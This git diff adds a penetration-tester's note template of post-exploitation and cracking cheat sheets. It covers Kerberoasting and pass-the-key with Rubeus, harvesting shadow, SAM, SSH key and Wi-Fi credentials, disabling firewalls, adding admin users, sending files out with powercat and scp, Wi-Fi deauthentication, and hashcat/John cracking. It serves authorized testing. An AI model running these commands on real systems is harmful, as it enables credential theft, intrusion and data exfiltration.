diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Rubeus.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Rubeus.md
new file mode 100644
index 0000000..0833644
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Rubeus.md	
@@ -0,0 +1,26 @@
+# Source
+
+- https://github.com/GhostPack/Rubeus
+
+Review the opsec notes before compiling the program in visual studio. 
+
+## ASREProasting:
+
+chek for users in the current domain:
+
+- Rubeus.exe asreproast  /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>
+
+## Kerberoasting:
+
+- Rubeus.exe kerberoast /outfile:<output_TGSs_file>
+
+- Rubeus.exe kerberoast /outfile:hashes.txt [/spn:"SID-VALUE"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] 
+
+## Pass the key (PTK):
+
+- .\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt
+
+
+## Using the ticket on a Windows target: 
+
+- Rubeus.exe ptt /ticket:<ticket_kirbi_file>
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/1. Output from Privesc Scripts/Output from [Linux_Windows Priv Esc Script].md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/1. Output from Privesc Scripts/Output from [Linux_Windows Priv Esc Script].md
new file mode 100644
index 0000000..0be96ad
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/1. Output from Privesc Scripts/Output from [Linux_Windows Priv Esc Script].md	
@@ -0,0 +1 @@
+# This is a note placeholder to put your output that you recieved from a priv esc script that you executed on the target you obtained access too. 
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Files on the System/General Notes Linux.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Files on the System/General Notes Linux.md
new file mode 100644
index 0000000..7bd19b0
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Files on the System/General Notes Linux.md	
@@ -0,0 +1,78 @@
+## Finding Sensitive files on Linux: 
+
+```
+locate password | more           
+/boot/grub/i386-pc/password.mod
+/etc/pam.d/common-password
+/etc/pam.d/gdm-password
+/etc/pam.d/gdm-password.original
+/lib/live/config/0031-root-password
+```
+- cat /etc/profile
+- cat /etc/passwd
+- cat /etc/group
+- cat /etc/shadow
+- cat /etc/gshadow
+- cat /var/apache2/config.inc
+- cat /var/lib/mysql/mysql/user.MYD
+- cat /root/anaconda-ks.cfg
+- cat ~/.bash_history
+- cat ~/.bash_profile
+- cat ~/.bash_login
+- cat ~/.nano_history
+- cat ~/.atftp_history
+- cat ~/.mysql_history
+- cat ~/.php_history
+- ls -alh /var/mail/
+
+Sensitive Files for SSH:
+
+- find / -name authorized_keys 2> /dev/null
+- find / -name id_rsa 2> /dev/null
+
+
+
+Log Files that could help:
+
+```
+cat /etc/httpd/logs/access_log
+cat /etc/httpd/logs/access.log
+cat /etc/httpd/logs/error_log
+cat /etc/httpd/logs/error.log
+cat /var/log/apache2/access_log
+cat /var/log/apache2/access.log
+cat /var/log/apache2/error_log
+cat /var/log/apache2/error.log
+cat /var/log/apache/access_log
+cat /var/log/apache/access.log
+cat /var/log/auth.log
+cat /var/log/chttp.log
+cat /var/log/cups/error_log
+cat /var/log/dpkg.log
+cat /var/log/faillog
+cat /var/log/httpd/access_log
+cat /var/log/httpd/access.log
+cat /var/log/httpd/error_log
+cat /var/log/httpd/error.log
+cat /var/log/lastlog
+cat /var/log/lighttpd/access.log
+cat /var/log/lighttpd/error.log
+cat /var/log/lighttpd/lighttpd.access.log
+cat /var/log/lighttpd/lighttpd.error.log
+cat /var/log/messages
+cat /var/log/secure
+cat /var/log/syslog
+cat /var/log/wtmp
+cat /var/log/xferlog
+cat /var/log/yum.log
+cat /var/run/utmp
+cat /var/webmin/miniserv.log
+cat /var/www/logs/access_log
+cat /var/www/logs/access.log
+ls -alh /var/lib/dhcp3/
+ls -alh /var/log/postgresql/
+ls -alh /var/log/proftpd/
+ls -alh /var/log/samba/
+
+Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp
+```
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Files on the System/General Notes Windows.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Files on the System/General Notes Windows.md
new file mode 100644
index 0000000..743737e
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Files on the System/General Notes Windows.md	
@@ -0,0 +1,59 @@
+# Sensitive Files to look for: 
+
+## Windows: 
+
+```
+%windir%\repair\sam
+%windir%\System32\config\RegBack\SAM
+%windir%\repair\system
+%windir%\repair\software
+%windir%\repair\security
+%windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account)
+%windir%\iis6.log (5,6 or 7)
+%windir%\system32\logfiles\httperr\httperr1.log
+C:\sysprep.inf
+C:\sysprep\sysprep.inf
+C:\sysprep\sysprep.xml
+%windir%\Panther\Unattended.xml
+C:\inetpub\wwwroot\Web.config
+%windir%\system32\config\AppEvent.Evt (Application log)
+%windir%\system32\config\SecEvent.Evt (Security log)
+%windir%\system32\config\default.sav
+%windir%\system32\config\security.sav
+%windir%\system32\config\software.sav
+%windir%\system32\config\system.sav
+%windir%\system32\inetsrv\config\applicationHost.config
+%windir%\system32\inetsrv\config\schema\ASPNET_schema.xml
+%windir%\System32\drivers\etc\hosts (dns entries)
+%windir%\System32\drivers\etc\networks (network settings)
+%windir%\system32\config\SAM (only really useful if you have access to the files while the machine is off)
+%windir%\unattend.xml
+%windir%\Windows\Panther\Unattend.xml
+%windir%\Windows\Panther\Unattend\Unattend.xml
+%windir%\Windows\system32\sysprep.inf
+%windir%\Windows\system32\sysprep\sysprep.xml
+C:\ProgramData\Configs\*
+C:\Program Files\Windows PowerShell\*
+dir c:*vnc.ini /s /b
+dir c:*ultravnc.ini /s /b
+```
+
+## Search for contents contained in a file:
+
+```
+cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
+findstr /si password *.xml *.ini *.txt *.config
+findstr /spin "password" *.*
+```
+
+## Search for a file with a certain filename:
+
+```
+dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
+where /R C:\ user.txt
+where /R C:\ *.ini
+```
+
+
+
+
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Files on the System/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Files on the System/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Files on the System/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your target here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Installed Applications/General Notes Linux.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Installed Applications/General Notes Linux.md
new file mode 100644
index 0000000..568f33e
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Installed Applications/General Notes Linux.md	
@@ -0,0 +1,40 @@
+## Debian:
+
+- ls -alh /usr/bin/
+- ls -alh /sbin/
+- dpkg -l
+- ls -alh /var/cache/apt/archivesO
+- ls /usr/share/applications | awk -F '.desktop' ' { print $1}' -
+
+## RedHat:
+
+- rpm -qa
+- ls -alh /var/cache/yum/
+
+
+## BSD:
+
+- pkg_info
+
+## Gentoo:
+
+- equery list 
+- eix -I
+
+## Arch Linux:
+
+- pacman -Q
+
+
+## Bash Script:
+
+```
+#!/bin/bash
+IFS=: read -ra dirs_in_path <<< "$PATH"
+
+for dir in "${dirs_in_path[@]}"; do
+    for file in "$dir"/*; do
+        [[ -x $file && -f $file ]] && printf '%s\n' "${file##*/}"
+    done
+done
+```
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Installed Applications/General Notes Windows.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Installed Applications/General Notes Windows.md
new file mode 100644
index 0000000..b432383
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Installed Applications/General Notes Windows.md	
@@ -0,0 +1,40 @@
+# PowerShell
+
+```
+Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table –AutoSize
+```
+
+## Obtaining a list of programs from a remote system:
+
+- ```Invoke-command -computer remote_pc_name {Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize }```
+
+## Here is a script that will pull a list of software that is installed on the users system:
+
+```
+$listsoftware= Get-ChildItem HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall
+
+$names = $listsoftware |foreach-object {Get-ItemProperty $_.PsPath}
+
+foreach ($name in $names)
+{
+    Write-Host $name.Displayname
+}
+```
+
+## WMI:
+
+- ```Get-WmiObject -Class Win32_Product | Select-Object -Property Name > C:\InstalledSoftwareList.txt ```
+
+## Reviewing Installed Windows Features
+
+- ```Get-WindowsFeature | Where-Object {$_.InstallState -eq 'Installed'}```
+
+# Wmic 
+
+## Note: Microsoft has planned to deprecrate this program in new versions of Windows. The commands used can be slow to run but it will return the results it needed:
+
+- wmic /output:C:\InstalledSoftwareList.txt product get name,version
+
+## Saving it to a text file:
+
+- wmic product get name,version /format:csv > C:\InstalledSoftware.csv
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Installed Applications/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Installed Applications/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Installed Applications/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your target here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Network/General Notes Linux.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Network/General Notes Linux.md
new file mode 100644
index 0000000..ee984e2
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Network/General Notes Linux.md	
@@ -0,0 +1,38 @@
+## What does the targets network look like:
+
+- /sbin/ifconfig -a
+- /sbin/ip addr
+- cat /etc/network/interfaces
+- cat /etc/sysconfig/network
+- ip addr show
+
+## Network configuration Settings: 
+
+- cat /etc/resolv.conf
+- cat /etc/sysconfig/network
+- cat /etc/networks
+- iptables -L
+- hostname
+- dnsdomainname
+
+## List all current connections
+
+- lsof -i
+- lsof -i :80
+- grep 80 /etc/services
+- netstat -antup
+- netstat -antpx
+- netstat -tulpn
+- chkconfig --list
+- chkconfig --list | grep 3:on
+
+## Check the routes: 
+
+- arp -e
+- route
+- route -n 
+- /sbin/route -nee
+- ip route list
+
+References: 
+
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Network/General Notes Windows.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Network/General Notes Windows.md
new file mode 100644
index 0000000..207d060
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Network/General Notes Windows.md	
@@ -0,0 +1,48 @@
+## List all network interfaces, IP, and DNS.
+
+- ipconfig /all
+- Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
+- Get-DnsClientServerAddress -AddressFamily IPv4 | ft
+
+
+## List all current connections
+
+netstat -nao
+
+## List firewall state and current configuration
+
+- netsh advfirewall firewall dump
+- netsh firewall show state
+- netsh firewall show config
+
+# List firewall's blocked ports
+
+- $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules |  where {$_.action -eq "0"} | select name,applicationname,localports
+
+# Disable firewall
+
+- netsh firewall set opmode disable (Older Versions of Windows)
+- netsh advfirewall set allprofiles state off
+
+## List current routing table
+
+- route print
+- Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
+
+## List the ARP table
+
+- arp -A
+- Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
+
+## List all network shares
+
+- net share
+
+## Wifi Passwords: 
+
+Finding the SSID:
+- netsh wland show profile
+
+Obtaining the cleartext password: 
+- netsh wlan show profile <SSID> key=clear
+- cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Network/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Network/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Network/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your target here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Running Processes/General Notes Linux.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Running Processes/General Notes Linux.md
new file mode 100644
index 0000000..ea453c4
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Running Processes/General Notes Linux.md	
@@ -0,0 +1,20 @@
+# Linux Commands to run:
+
+- top
+- htop
+- ps -e
+- ps aux
+- ps aux | more
+- ps aux | less
+
+## Finding processes
+
+- pgrep <process-name>
+
+## Terminating a Process
+
+- kill
+- kill -9 PID
+- pkill processName
+- killall
+
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Running Processes/General Notes Windows.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Running Processes/General Notes Windows.md
new file mode 100644
index 0000000..bd3d89c
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Running Processes/General Notes Windows.md	
@@ -0,0 +1,11 @@
+# Check for Processes
+
+- tasklist
+- wmic process list full
+
+# In PowerShell
+- Get-Process
+- Get-Process -Name 'Notepad'
+
+List path where the process is running:
+- (Get-Process -Name 'Calculator').Path
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Running Processes/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Running Processes/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Running Processes/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your target here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Scheduled Jobs_Tasks/General Notes Linux.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Scheduled Jobs_Tasks/General Notes Linux.md
new file mode 100644
index 0000000..53cafb1
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Scheduled Jobs_Tasks/General Notes Linux.md	
@@ -0,0 +1,7 @@
+# Linux: 
+
+- cat /etc/crontab
+- cat /etc/anacrontab
+- cat /etc/frontal
+- cat /etc/anacron
+- systemctl list-timers --all
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Scheduled Jobs_Tasks/General Notes Windows.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Scheduled Jobs_Tasks/General Notes Windows.md
new file mode 100644
index 0000000..5ed0440
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Scheduled Jobs_Tasks/General Notes Windows.md	
@@ -0,0 +1,16 @@
+# Windows: 
+
+- schtasks
+
+## Impacket: 
+
+- python3 atexec.py Domain/Administrator:<Password>@123@172.21.0.0 systeminfo
+
+
+# Linux: 
+
+- cat /etc/crontab
+- cat /etc/anacrontab
+- cat /etc/frontal
+- cat /etc/anacron
+- systemctl list-timers --all
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Scheduled Jobs_Tasks/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Scheduled Jobs_Tasks/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Scheduled Jobs_Tasks/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your target here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/System Exploitation/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/System Exploitation/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/System Exploitation/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your target here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/System Information/General Notes Linux.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/System Information/General Notes Linux.md
new file mode 100644
index 0000000..c3d32ee
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/System Information/General Notes Linux.md	
@@ -0,0 +1,23 @@
+## For all Linux Distro's:
+
+- uname -a
+- cat /etc/issue
+- cat /proc/version
+
+## PowerShell 
+
+- $PSVersionTable
+
+Obtaining Systems Enviorment Variables:
+
+- Get-ChildItem -Path Env:
+
+
+## Debian:
+
+- dmesg | grep Linux
+
+## RedHat:
+
+- rpm -q kernel
+
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/System Information/General Notes Windows.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/System Information/General Notes Windows.md
new file mode 100644
index 0000000..7f7edd4
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/System Information/General Notes Windows.md	
@@ -0,0 +1,9 @@
+# Command Line: 
+
+- systeminfo
+
+# PowerShell
+
+- Get-ComputerInfo
+- Get-ComputerInfo -Property "*version"
+- Get-ComputerInfo -Property "*version", "os*" | select WindowsCurrentVersion, WindowsVersion, OsName, OsBuildNumber, OsHotFixes, OsArchitecture | fl
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/System Information/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/System Information/Target _1.md
new file mode 100644
index 0000000..e69de29
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Users and Groups/General Notes Linux_.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Users and Groups/General Notes Linux_.md
new file mode 100644
index 0000000..31964bf
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Users and Groups/General Notes Linux_.md	
@@ -0,0 +1,21 @@
+## Enumerating Linux Users
+
+- cat /etc/passwd
+- less etc/passwd
+- getent passwd | awk -F: '{ print $1}'
+- cut -d: -f1 /etc/passwd
+- awk –F: ‘{ print $1}’ /etc/passwd
+- getent parrwd {1000..6000}
+
+## enumerating Users Permissions
+
+- id
+- id -nG
+- getent group <group-name>
+
+## Enumerating Linux Groups
+
+- groups
+- less /etc/group
+- getent groups
+- getent group | awk -F: '{ print $1}'
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Users and Groups/General Notes Windows.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Users and Groups/General Notes Windows.md
new file mode 100644
index 0000000..ca735d8
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Users and Groups/General Notes Windows.md	
@@ -0,0 +1,24 @@
+View your current user: 
+
+- whoami
+
+View information about the current user: 
+
+- net user afsimmons
+
+- net user afsimmons /domain (For a domain user)
+
+View Local Groups: 
+
+- net localgroup
+- net localgroup Administrators
+
+Add a new user: 
+
+- net user afsimmons enterpasswordhere /add
+
+Add a user in a localgroup:
+
+- net localgroup Administrators afsimmons
+
+
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Users and Groups/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Users and Groups/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Users and Groups/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your target here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Transferring Files.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Transferring Files.md
new file mode 100644
index 0000000..2993d3f
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Transferring Files.md	
@@ -0,0 +1,55 @@
+# Services to Host Files on your System: 
+
+General Options: 
+
+FTP:
+
+Install pyftpdlib
+- pip3 install pyftpdlib
+
+Pure-ftpd
+- sudo apt install pure-ftpd
+- service pure-ftpd start
+
+Run (-w flag allows anonymous write access)
+- Python3 -m pyftpdlib -p 21 -w
+
+Web: 
+
+- Python3 -m http.server 443
+- service apache2 start
+
+Powershell: 
+
+Raw (Will get flagged by AV/AMSI): 
+
+- powershell -c (New-Object Net.WebClient).DownloadFile('http://172.21.0.0:port/file', 'output-file'
+- powershell -c Invoke-WebRequest -Uri "http://172.21.0.0" -OutFile "C:\path\file"
+
+
+Use Powercat: 
+
+Send File:
+    powercat -c 10.1.1.1 -p 443 -i C:\inputfile
+Recieve File:
+    powercat -l -p 8000 -of C:\inputfile
+
+Linux: 
+
+scp: 
+
+- scp [OPTION] [user@]SRC_HOST:]file1 [user@]DEST_HOST:]file2
+
+scp through ssh: 
+
+- scp -P 2322 passwords.txt remote_username@172.21.0.2:/remote/directory
+
+scp remote file to local system: 
+
+- scp remote_username@172.21.0.2:/remote/file.txt /local/directory
+
+
+# Services to allow you to upload files to your system from the target: 
+
+- SimpleHTTPServer Upload: https://gist.github.com/touilleMan/eb02ea40b93e52604938
+    
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Cracking WEP_WPA_WPA 2 PSK Authetication.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Cracking WEP_WPA_WPA 2 PSK Authetication.md
new file mode 100644
index 0000000..2f697ae
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Cracking WEP_WPA_WPA 2 PSK Authetication.md	
@@ -0,0 +1,36 @@
+## Capture Handshake
+
+1. airmon-ng start wlan0
+2. airodump-ng mon0 --write capture.cap -c 11
+3. aireplay-ng --deauth 0 -a bb:bb:bb:bb:bb:bb mon0
+
+Convert pcap files for john and hashcat
+
+/usr/lib/hashcat-utils/cap2hccapx.bin input.pcap output.hccapx [filter by essid] [additional network essid:bssid]
+/usr/sbin/hccap2john
+/usr/sbin/vncpcap2john
+/usr/sbin/wpapcap2john
+
+
+## Cracking Handshake with Aircrack
+
+- aircrack-ng -w /usr/share/wordlist/fasttrack.txt 0001.cap
+
+## Cracking Handshakes with Hashcat
+
+- hashcat.exe -m 2500 capture.hccapx rockyou.txt (Dictionary Attack)
+- hashcat.exe -m 2500 -a3 capture.hccapx ?d?d?d?d?d?d?d?d (Brute-Force)
+- hashcat.exe -m 2500 -r rules/best64.rule capture.hccapx rockyou.txt (Rule-Based)
+
+## Cracking Handshakes with John The Ripper
+
+Did you run hccap2john?
+
+- john --format=wpapsk --wordlist=/usr/share/wordlists/rockyou.txt crackmecap
+- john --format=wpapsk-opencl --wordlist=/usr/share/wordlists/rockyou.txt crackmecap
+
+
+
+Other Resources: 
+
+https://github.com/lgandx/PCredz 
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Hashcat.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Hashcat.md
new file mode 100644
index 0000000..da4de42
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Hashcat.md	
@@ -0,0 +1,61 @@
+
+## BENCHMARK TEST (HASH TYPE)
+
+- hashcat -b -m #type
+
+## SHOW EXAMPLE HASH
+
+- hashcat -m #type --example-hashes
+
+## DICTIONARY ATTACK
+
+- hashcat -a 0 -m #type hash.txt dict.txt
+
+DICTIONARY + RULES ATTACK
+
+- hashcat -a 0 -m #type hash.txt dict.txt -r rule.txt
+
+COMBINATION ATTACK
+
+- hashcat -a 1 -m #type hash.txt dict1.txt dict2.txt
+
+## MASK ATTACK
+
+- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a
+
+HYBRID DICTIONARY + MASK
+
+- hashcat -a 6 -m #type hash.txt dict.txt ?a?a?a?a
+
+HYBRID MASK + DICTIONARY
+
+- hashcat -a 7 -m #type hash.txt ?a?a?a?a dict.txt
+
+
+## INCREMENT
+
+DEFAULT INCREMENT
+
+- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment
+
+INCREMENT MINIMUM LENGTH
+
+- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment-min=4
+
+INCREMENT MAX LENGTH
+
+- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a --increment-max=5
+
+SESSION RESTORE
+
+- hashcat -a 0 -m #type --restore --session <uniq_name> hash.txt dict.txt
+
+
+## Cracking krb5ts Keys
+
+- hashcat -m 13100 --force <TGSs_file> <passwords_file>
+
+## Cracking Asrep keys
+
+- hashcat -a 0 -m 18200 <asrep_file> <password_file> 
+
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/John The Ripper.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/John The Ripper.md
new file mode 100644
index 0000000..b110a6e
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/John The Ripper.md	
@@ -0,0 +1,47 @@
+DICTIONARY ATTACK
+- john --format=#type --wordlist=dict.txt hash.txt
+
+BRUTEFORCE ATTACK
+- john --format=#type hash. txt
+
+MASK ATTACK
+- john --format=#type --mask=?l?l?l?l?l?l hash.txt -min-len=6
+
+INCREMENTAL ATTACK
+- john --incremental hash.txt
+
+DICTIONARY + RULES ATTACK
+- john --format=#type --wordlist=dict.t
+
+
+Other Notes:
+
